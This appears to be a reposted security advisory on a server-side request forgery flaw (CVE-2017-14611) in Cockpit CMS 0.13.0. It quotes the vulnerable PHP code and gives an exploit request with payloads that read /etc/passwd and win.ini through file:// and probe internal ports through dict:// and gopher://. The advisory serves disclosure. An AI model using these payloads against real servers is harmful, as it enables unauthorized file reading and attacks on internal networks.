# SSRF(Server Side Request Forgery) in Cockpit CMS 0.13.0 (CVE-2017-14611) The Cockpit CMS is awesome if you need a flexible content structure but don't want to be limited in how to use the content. ## Product Download: https://getcockpit.com/ ## Vulnerability Type:SSRF(Server Side Request Forgery) ## Attack Type : Remote ## Vulnerability Description Cockpit CMS uses a `fetch_url_contents` (https://github.com/aheinze/fetch_url_contents)project code on github website, This Project has SSRF Vulnerability,So affect the system. The vulnerability code(/assets/lib/fuc.js.php): if (isset($_REQUEST['url'])) { // allow only query from same host echo(parse_url($_SERVER['HTTP_REFERER'],PHP_URL_HOST)); if ($_SERVER['HTTP_HOST'] != parse_url($_SERVER['HTTP_REFERER'], PHP_URL_HOST)) { header('HTTP/1.0 401 Unauthorized'); return; } $url = $_REQUEST['url']; $content = ''; if (function_exists('curl_exec')){ $conn = curl_init($url); curl_setopt($conn, CURLOPT_SSL_VERIFYPEER, true); curl_setopt($conn, CURLOPT_FRESH_CONNECT, true); curl_setopt($conn, CURLOPT_RETURNTRANSFER, 1); curl_setopt($conn,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.52 Safari/537.17'); curl_setopt($conn, CURLOPT_AUTOREFERER, true); curl_setopt($conn, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($conn, CURLOPT_VERBOSE, 0); $content = curl_exec($conn); curl_close($conn); } if (!$content && function_exists('file_get_contents')){ $content = @file_get_contents($url); } if (!$content && function_exists('fopen') && function_exists('stream_get_contents')){ $handle = @fopen ($url, "r"); $content = @stream_get_contents($handle); } if (!$content) { header('HTTP/1.0 503 Service Unavailable'); } return print($content); } ## Exploit GET /assets/lib/fuc.js.php?url=dict://127.0.0.1:3306 HTTP/1.1 Host: 127.0.0.1 Connection: close Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8 referer:https://ift.tt/U8gKCv modify the above url parameter,example,file: request http(s) protocol: url=http(s)://www.google.com file read:url=file:///etc/passwd or url=file:///c:/windows/win.ini If the curl function is available,then use gopher、tftp、http、https、dict、ldap、file、imap、pop3、smtp、telnet protocols method,if not then only use http、https、ftp protocol scan prot,example: url=dict://127.0.0.1:3306 use gopher protocol: url=gopher://127.0.0.1:3306 If the curl function is unavailable,this vulnerability trigger need allow\_url\_fopen option is enable in php.ini,allow\_url\_fopen option defualt is enable. ## Versions Cockpit 0.13.0 ## Impact SSRF(Server Side Request Forgery) in Cockpit 0.13.0 version allow remote attackers to arbitrary files read,scan network port,information detection,internal network server attack. ## Credit This vulnerability was discovered by Qian Wu & Bo Wang & Jiawang Zhang & National Computer Network Emergency Response Technical Team/Coordination Center of China (CNCERT/CC) ## References CVE: https://ift.tt/2GXSvY3
Source: Gmail -> IFTTT-> Blogger
No comments:
Post a Comment